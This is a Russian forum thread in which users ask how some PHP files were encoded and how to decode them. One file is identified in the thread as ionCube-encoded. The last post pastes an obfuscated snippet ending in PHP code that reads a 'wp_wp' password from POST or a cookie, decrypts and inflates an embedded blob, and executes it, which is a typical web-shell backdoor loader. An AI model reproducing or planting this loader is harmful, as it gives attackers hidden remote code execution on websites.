Наташа Жирук

чем закодирован php фаил и как его разкодировать?

1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}@dl($__ln);}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file '.__FILE__.' requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');exit(199);
?>
4+oV588ZnlZUz3h/3REQKzizIq0HHsXocnmUYUWAzZvAWcOoPGqn9kvk/74LeKxH4b2OtOte6z0U
zwLjj9/mVqT8RZ7uKxE9FjObLTFjqXNfHQ/91itD6nC0p8fB565KOU+MEmqpQT/ZIindQfNbKrYg
DpSIlOXoSMkA+FY4l5fnys2TkoOHD5+ufqTDtho8OdYCcpBwIX6YCet730xc1/pl4f5JPuA7ERI4
D8Gi8lyzRolLziy96EfQX82mPgQgsGUexFvUEfk7S0NSrs5R8bUOjX7D0cXlmENFzoy+GQD44VIt
puBHA0chUot/P+MolUvqUuela7LpdVeZIDhXV7HmlvEEK8dwIW21at3VLGjEQ4QrrvsL2so6g6kF
BHjGaOD+mxOuXizg5dtpUMappBUFx9jt3nN/K+qe5fzluUkTE0P6I18m+Q8/AGyXU70URoeJRqGY
BmfByCj9LVdU2joXk+elYccdb+c8NThx1o+rCqVJ8G==

1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}@dl($__ln);}else{die('The file '.__FILE__." is corrupted.\n");}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file '.__FILE__.' requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');exit(199);
?>
4+oV588ZnlZUz3h/3REQKzizIq0HHsXocnmUYUWAzZvAWcOoPGqn9kvk/74LeKxH4b2OtOte6z0U
zwLjj9/mVqT8RZ7uKxE9FjObLTFjqXNfHQ/91itD6nC0p8fB565KOU+MEmqpQT/ZIindQfNbKrYg
DpSIlOXoSMkA+FY4l5fnys2TkoOHD5+ufqTDtho8OdYCcpBwIX6YCet730xc1/pl4f5JPuA7ERI4
D8Gi8lyzRolLziy96EfQX82mPgQgsGUexFvUEfk7S0NSrs5R8bUOjX7D0cXlmENFzoy+GQD44VIt
puBHA0chUot/P+MolUvqUuela7LpdVeZIDhXV7HmlvEEK8dwIW21at3VLGjEQ4QrrvsL2so6g6kF
BHjGaOD+mxOuXizg5dtpUMappBUFx9jt3nN/K+qe5fzluUkTE0P6I18m+Q8/AGyXU70URoeJRqGY
BmfByCj9LVdU2joXk+elYccdb+c8NThx1o+rCqVJ8G==

http://visavi.net/forum/topic.php?tid=36892&

Андрей Котельников

Ну видно же - ionCube encoder..
http://habrahabr.ru/post/140159/
+ http://raz0r.name/articles/how-to-decrypt-php-script/
+ http://foren.germany.ru/arch/webmaster/f/20733521.html

даже после раскодирования все равно приходится править много руками.

Алена Пажетных

а не проще с нуля написать этот скрипт? темболие шпаргалка есть.:)

Ал
Алена

Может с этим кто подскажет. Чем закодировано. Чем раскодировать.

Тут начало и конец в середине "бурда".

37ozter+h/o/oV17CDZCfjm5QnfkfyNJnTmdMVsmR5FwSD9O2iSWQnbf2jnwnXD9pXPrcfn1v3D1f54z
LX3uhYWGVNvVfYrPc80692oY5WlGEempAall6xrdPLO+/Dize4OlfnT9f5xjhs2sxRtIXaO4Dw7Q75xi
exWKbBKfEZ3h0vl086DagJNUo6QINzEQ73EJ3R1bACX7pathzBN3h7l96Mj/JAy1taaUSceFHHX2pveI
nPXU8RhSNCvXXqA+iuXLGG515eBMBKoRU57UHQbDgPdRgGqR4ZCxdqjLui9glXG/5NTcqFMAuBtAGl4

uWSofLT/83dy700uKmfIOe+Bk7BcZ+W67c8uuiYHcUy8IfXuIig1q33rS6ba5UK3738u4iULNDrhfy7o
ue5BjpRF/KV88c5zPveYf1dJUR7AP2JsPX0locW6aaSS8Ef5wIKjFkgvem7/tAKMo/GQXbSqf+J1jJ0d
EnzEt8TlyI5On9OlUYcLQpjEhUb7eeCKYhmkgq8KB9yBppF0uwbVzZ0XQu8huH4=
'));$wp_wp=isset($_POST['wp_wp'])?$_POST['wp_wp']:(isset($_COOKIE['wp_wp'])?$_COOKIE['wp_wp']:NULL);if($wp_wp!==NULL){$wp_wp=md5($wp_wp).substr(MD5(strrev($wp_wp)),0,strlen($wp_wp));for($wp___wp=0;$wp___wp<15587;$wp___wp++){$wp__wp[$wp___wp]=chr(( ord($wp__wp[$wp___wp])-ord($wp_wp[$wp___wp]))%256);$wp_wp.=$wp__wp[$wp___wp];}if($wp__wp=@gzinflate($wp__wp)){if(isset($_POST['wp_wp']))@setcookie('wp_wp', $_POST['wp_wp']);$wp___wp=create_function('',$wp__wp);unset($wp_wp,$wp__wp);$wp___wp();}}?>